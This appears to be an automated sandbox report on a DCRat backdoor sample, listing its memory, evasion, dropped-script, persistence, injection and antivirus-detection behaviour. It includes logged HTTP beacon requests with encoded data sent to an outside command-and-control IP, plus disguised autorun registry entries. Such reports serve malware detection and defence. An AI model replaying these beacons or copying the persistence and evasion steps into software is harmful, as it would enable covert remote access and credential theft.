NtAllocateVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92be6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92bc0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92b0b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92b2b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92b5c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92b2d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92b0c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c41000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92b1d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c42000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92b1a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92b02000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c43000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c45000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c91000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92b5d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c46000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:02 p.m.	process_identifier: 2508 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c47000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (3 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceExW Aug. 24, 2021, 12:02 p.m.	total_number_of_free_bytes: 10236542976 free_bytes_available: 10236542976 root_path: C:\ total_number_of_bytes: 34252779520	1	1
GetDiskFreeSpaceExW Aug. 24, 2021, 11:55 a.m.	total_number_of_free_bytes: 10232799232 free_bytes_available: 10232799232 root_path: C:\ total_number_of_bytes: 34252779520	1	1
GetDiskFreeSpaceExW Aug. 24, 2021, 11:56 a.m.	total_number_of_free_bytes: 10230743040 free_bytes_available: 10230743040 root_path: C:\ total_number_of_bytes: 34252779520	1	1

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Local\Temp\y2c07uXShI.bat
file	C:\Users\test22\AppData\Local\Temp\eoyVb9BqpK.bat

Creates a suspicious process (2 events)

cmdline	"C:\Windows\System32\cmd.exe" /C "C:\Users\test22\AppData\Local\Temp\y2c07uXShI.bat"
cmdline	"C:\Windows\System32\cmd.exe" /C "C:\Users\test22\AppData\Local\Temp\eoyVb9BqpK.bat"

Drops a binary and executes it (2 events)

file	C:\Users\test22\AppData\Local\Temp\y2c07uXShI.bat
file	C:\Users\test22\AppData\Local\Temp\eoyVb9BqpK.bat

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Aug. 24, 2021, 12:02 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\y2c07uXShI.bat parameters: filepath: C:\Users\test22\AppData\Local\Temp\y2c07uXShI.bat	1	1	0
ShellExecuteExW Aug. 24, 2021, 11:56 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\eoyVb9BqpK.bat parameters: filepath: C:\Users\test22\AppData\Local\Temp\eoyVb9BqpK.bat	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Aug. 24, 2021, 11:56 a.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (3 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Aug. 24, 2021, 12:02 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Aug. 24, 2021, 11:55 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Aug. 24, 2021, 11:56 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (50 out of 62 events)

description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Steal credential	rule	local_credential_Steal
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Detection of Virtual Appliances through the use of WMI for use of evasion.	rule	WMI_VM_Detect
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Steal credential	rule	local_credential_Steal
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	chcp 65001
cmdline	"C:\Users\test22\AppData\Local\Temp\DCRAT.exe"

Communicates with host for which no DNS query was performed (1 event)

host

52.158.47.4

Installs itself for autorun at Windows startup (10 events)

reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc	reg_value	"C:\Windows\System32\hidserv\sppsvc.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm	reg_value	"C:\Windows\System32\TpmInit\dwm.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhost	reg_value	"C:\MSOCache\All Users\{90150000-002C-0409-0000-0000000FF1CE}-C\taskhost.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss	reg_value	"C:\Windows\System32\sppinst\csrss.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv	reg_value	"C:\GPKI\spoolsv.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv	reg_value	"C:\Windows\System32\timedate\spoolsv.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon	reg_value	"C:\Windows\System32\dskquota\winlogon.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon	reg_value	"C:\Users\test22\시작 메뉴\winlogon.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DCRAT	reg_value	"C:\Users\test22\AppData\Local\Temp\{1C306CB1-771E-4B4B-A902-86E897877F5B}\DCRAT.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss	reg_value	"C:\Windows\System32\sppuinotify\csrss.exe"

Deletes executed files from disk (1 event)

file	C:\Users\test22\AppData\Local\Temp\y2c07uXShI.bat

Network communications indicative of possible code injection originated from the process winlogon.exe (3 events)

Time & API	Arguments	Status	Return
send Aug. 24, 2021, 11:56 a.m.	buffer: GET /javascriptPollhttpLongpoll.php?gYQiHgBoraZJp0sBv=v8tc5kTrjNhfpeQ4JfvCdeMEktzeM&m3ueS5wDdqOa6yGMu53v=MQtbRvp1Luyf8lovLMUHFC&eeba483f778911903cf941b68c630bd5=c6f9f06b86c5fe1279ff41ef4bf3f710&85f5986082198b606d527e0650b5ef02=QNjhTO4Q2NiJWMjRWO1IjYwIjM5ADNzQWMiVWNxUjNxIzMmJmY3QGO&gYQiHgBoraZJp0sBv=v8tc5kTrjNhfpeQ4JfvCdeMEktzeM&m3ueS5wDdqOa6yGMu53v=MQtbRvp1Luyf8lovLMUHFC HTTP/1.1 Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Host: 52.158.47.4 Connection: Keep-Alive socket: 960 sent: 559	1	559
send Aug. 24, 2021, 11:56 a.m.	buffer: GET /javascriptPollhttpLongpoll.php?gYQiHgBoraZJp0sBv=v8tc5kTrjNhfpeQ4JfvCdeMEktzeM&m3ueS5wDdqOa6yGMu53v=MQtbRvp1Luyf8lovLMUHFC&7f85f2c144b70ea263aa66e5a581cc10=AOzAjZ4cjZ1cTM2UjYyMmY4gTNjhTMyQWOlZWMmBTZlZmZlZmZzkjN0AjNycDO0EzMyIDM2ATO&85f5986082198b606d527e0650b5ef02=gZlVmYmFTOxU2N5EmMhZTZ0IDOihjY1ITY3gTO2ATOhRGOjNzY1UWN&203c937cd11a470beeb4818efaf5745a=d1nIwQTZ0YTO1EGZjZTY2QWO0YDZzMmZ2MjYjlTYzI2NhZzNldDO1IWYlJiOiEjY3IzMiJTMlRGO5Q2YwATZmZGZyMjMlBjNzQ2Y0gjYiwiI1AjZ1IzN0UDM3UWZ1gzY0IzY0UGM3IjZwYzMmVjZjRjZyE2NkhjM3IiOiMmZmRzYwEzM1cTM3UGM4ADO3EDMkVmM3gTZxkTNhNGOis3W&15c8a6031aa36409a7e96bf6d99174e8=QX9JiI6IiYzETYzMjZzUDN5AjZ3Y2YlBDNlFmZmVTOmRDZ2YzYxICLiADNlRjN5UTYkNmNhZDZ5QjNkNzYmZzMiNWOhNjY3EmN3U2N4UjYhVmI6ISMidjMzImMxUGZ4kDZjBDMlZmZkJzMyUGM2MDZjRDOiJCLiUDMmVjM3QTNwcTZlVDOjRjMjRTZwcjMmBjNzYWNmNGNmJTY3QGOycjI6IyYmZGNjBTMzUzNxcTZwgDM4cTMwQWZycDOlFTO1E2Y4Iyes0nI5oUajxGZXlVdGdFVnBzVZlHZyIWeCxWS2kUekZnUtJGckZkVEZ0aJNXSTdVavpWS1x2VitmRwMGcKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJNVT3F1RiBnStlkNJlnUCJFbJNXSDRGcKVUSwkFRJ9kQDJGa1IjYw50MjxmWyIWeCZUSzEUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3UmlWRXpVe5IzUnd2RkFTOyU1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMl2aE9EeFpGTzkEVNNXSU10dVpGTz0kaJZTS5lld41WSzlUaVxkSp9Uar52YwUzVkZnTtl0cJNkYxkzVaRlSp9Ua0IjYwR2ValnSDxUaVNjW0V0Rj5WNyIGVKl2TptGSkBnTtl0cJNUTxUkaMBTTU1UdnRUT5RzUONTRqlkNJN0YwpUelZTS5JWb1c1U3x2aJNXSp1UeRNzYsJlbJZTSTpFdG1GV5ZlMjZlSDxUaNVUV0lkaNVlTWJVVKl2TpV1VihWNwEVUKNETpVkaMBDND5UavpWS5ZVbWlnVtRWeWJTVpdXaJZDawI1dnpGT5F0QRdWVGVFRCNUT3FFRPRXVUF2ZrNFVVh2UalXOyE1ZrlWVvd3VaBTNXNVavpWSsFzVZ9kVGVFRKNETplURJdXQTx0ZJhlWwIEWZtmRFlkeOdVYvJEWZlHZFlkQktmVnFVbjhmUtJGaSNTVp9maJxWMXl1TWZUVIp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiI2MxE2MzY2M1QTOwY2NmNWZwQTZhZmZ1kjZ0QmN2MWMiwiIkBjYhNDOkFmY4UDZ1Y2YlRzM3EjZ5cDMxgzYhRTNhhTYxEWYxYTZwIiOiEjY3IzMiJTMlRGO5Q2YwATZmZGZyMjMlBjNzQ2Y0gjYiwiI1AjZ1IzN0UDM3UWZ1gzY0IzY0UGM3IjZwYzMmVjZjRjZyE2NkhjM3IiOiMmZmRzYwEzM1cTM3UGM4ADO3EDMkVmM3gTZxkTNhNGOis3W HTTP/1.1 Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Host: 52.158.47.4 socket: 960 sent: 2111	1	2111
send Aug. 24, 2021, 11:56 a.m.	buffer: GET /javascriptPollhttpLongpoll.php?gYQiHgBoraZJp0sBv=v8tc5kTrjNhfpeQ4JfvCdeMEktzeM&m3ueS5wDdqOa6yGMu53v=MQtbRvp1Luyf8lovLMUHFC&7f85f2c144b70ea263aa66e5a581cc10=AOzAjZ4cjZ1cTM2UjYyMmY4gTNjhTMyQWOlZWMmBTZlZmZlZmZzkjN0AjNycDO0EzMyIDM2ATO&85f5986082198b606d527e0650b5ef02=gZlVmYmFTOxU2N5EmMhZTZ0IDOihjY1ITY3gTO2ATOhRGOjNzY1UWN&203c937cd11a470beeb4818efaf5745a=d1nIwQTZ0YTO1EGZjZTY2QWO0YDZzMmZ2MjYjlTYzI2NhZzNldDO1IWYlJiOiEjY3IzMiJTMlRGO5Q2YwATZmZGZyMjMlBjNzQ2Y0gjYiwiI1AjZ1IzN0UDM3UWZ1gzY0IzY0UGM3IjZwYzMmVjZjRjZyE2NkhjM3IiOiMmZmRzYwEzM1cTM3UGM4ADO3EDMkVmM3gTZxkTNhNGOis3W&15c8a6031aa36409a7e96bf6d99174e8=QX9JiI6IiYzETYzMjZzUDN5AjZ3Y2YlBDNlFmZmVTOmRDZ2YzYxICLiADNlRjN5UTYkNmNhZDZ5QjNkNzYmZzMiNWOhNjY3EmN3U2N4UjYhVmI6ISMidjMzImMxUGZ4kDZjBDMlZmZkJzMyUGM2MDZjRDOiJCLiUDMmVjM3QTNwcTZlVDOjRjMjRTZwcjMmBjNzYWNmNGNmJTY3QGOycjI6IyYmZGNjBTMzUzNxcTZwgDM4cTMwQWZycDOlFTO1E2Y4Iyes0nI5oUajxGZXlVdGdFVnBzVZlHZyIWeCxWS2kUekZnUtJGckZkVEZ0aJNXSTdVavpWS1x2VitmRwMGcKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJNVT3F1RiBnStlkNJlnUCJFbJNXSDRGcKVUSwkFRJ9kQDJGa1IjYw50MjxmWyIWeCZUSzEUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3UmlWRXpVe5IzUnd2RkFTOyU1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMl2aE9EeFpGTzkEVNNXSU10dVpGTz0kaJZTS5lld41WSzlUaVxkSp9Uar52YwUzVkZnTtl0cJNkYxkzVaRlSp9Ua0IjYwR2ValnSDxUaVNjW0V0Rj5WNyIGVKl2TptGSkBnTtl0cJNUTxUkaMBTTU1UdnRUT5RzUONTRqlkNJN0YwpUelZTS5JWb1c1U3x2aJNXSp1UeRNzYsJlbJZTSTpFdG1GV5ZlMjZlSDxUaNVUV0lkaNVlTWJVVKl2TpV1VihWNwEVUKNETpVkaMBDND5UavpWS5ZVbWlnVtRWeWJTVpdXaJZDawI1dnpGT5F0QRdWVGVFRCNUT3FFRPRXVUF2ZrNFVVh2UalXOyE1ZrlWVvd3VaBTNXNVavpWSsFzVZ9kVGVFRKNETplURJdXQTx0ZJhlWwIEWZtmRFlkeOdVYvJEWZlHZFlkQktmVnFVbjhmUtJGaSNTVp9maJxWMXl1TWZUVIp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiI2MxE2MzY2M1QTOwY2NmNWZwQTZhZmZ1kjZ0QmN2MWMiwiIkBjYhNDOkFmY4UDZ1Y2YlRzM3EjZ5cDMxgzYhRTNhhTYxEWYxYTZwIiOiEjY3IzMiJTMlRGO5Q2YwATZmZGZyMjMlBjNzQ2Y0gjYiwiI1AjZ1IzN0UDM3UWZ1gzY0IzY0UGM3IjZwYzMmVjZjRjZyE2NkhjM3IiOiMmZmRzYwEzM1cTM3UGM4ADO3EDMkVmM3gTZxkTNhNGOis3W HTTP/1.1 Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Host: 52.158.47.4 socket: 960 sent: 2111	1	2111

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 108 resumed a thread in remote process 2536
Process injection	Process 2744 resumed a thread in remote process 2816
NtResumeThread Aug. 24, 2021, 11:55 a.m.	thread_handle: 0x0000000000000068 suspend_count: 0 process_identifier: 2536	1	0	0
NtResumeThread Aug. 24, 2021, 11:56 a.m.	thread_handle: 0x0000000000000068 suspend_count: 0 process_identifier: 2816	1	0	0

File has been identified by 48 AntiVirus engines on VirusTotal as malicious (48 events)

Lionic	Trojan.MSIL.Stealer.l!c
Elastic	malicious (high confidence)
Cynet	Malicious (score: 100)
CAT-QuickHeal	Trojan.YakbeexMSIL.ZZ4
ALYac	DeepScan:Generic.MSIL.PasswordStealerA.CFC3ECB6
Cylance	Unsafe
Sangfor	Trojan.Win32.Save.a
CrowdStrike	win/malicious_confidence_100% (W)
Alibaba	TrojanSpy:MSIL/Stealer.2338954a
K7AntiVirus	Spyware ( 0058121e1 )
Arcabit	DeepScan:Generic.MSIL.PasswordStealerA.CFC3ECB6
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of MSIL/Spy.Agent.AES
APEX	Malicious
Paloalto	generic.ml
ClamAV	Win.Packed.Uztuby-9853721-0
Kaspersky	HEUR:Trojan-Spy.MSIL.Stealer.gen
BitDefender	DeepScan:Generic.MSIL.PasswordStealerA.CFC3ECB6
MicroWorld-eScan	DeepScan:Generic.MSIL.PasswordStealerA.CFC3ECB6
Avast	Win32:KeyloggerX-gen [Trj]
Tencent	Word.Trojan.Generic.Ajkz
Ad-Aware	DeepScan:Generic.MSIL.PasswordStealerA.CFC3ECB6
Sophos	Mal/SpyNoon-A
F-Secure	Trojan.TR/Spy.Agent.pxvov
DrWeb	BackDoor.QuasarNET.3
TrendMicro	TROJ_GEN.R06CC0PHJ21
McAfee-GW-Edition	GenericRXPF-LQ!E8317CAAC656
FireEye	Generic.mg.e8317caac6568f4d
Emsisoft	Trojan-Spy.Agent (A)
Ikarus	Trojan.MSIL.Spy
Avira	TR/Spy.Agent.pxvov
Kingsoft	Win32.Troj.Undef.(kcloud)
Microsoft	Trojan:Win32/Ditertag.A
ZoneAlarm	HEUR:Trojan-Spy.MSIL.Stealer.gen
GData	DeepScan:Generic.MSIL.PasswordStealerA.CFC3ECB6
AhnLab-V3	Trojan/Win.Spy.C4559049
McAfee	GenericRXPF-LQ!E8317CAAC656
MAX	malware (ai score=100)
Malwarebytes	Backdoor.DCRat
TrendMicro-HouseCall	TROJ_GEN.R06CC0PHJ21
Rising	Backdoor.DCRat!1.D886 (CLASSIC)
Yandex	TrojanSpy.Agent!ppUcwOFmbWw
SentinelOne	Static AI - Malicious PE
eGambit	Unsafe.AI_Score_100%
Fortinet	MSIL/Agent.DEK!tr
BitDefenderTheta	Gen:NN.ZemsilF.34088.Em0@aauQdPki
AVG	Win32:KeyloggerX-gen [Trj]
Panda	Trj/GdSda.A

DCRAT.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All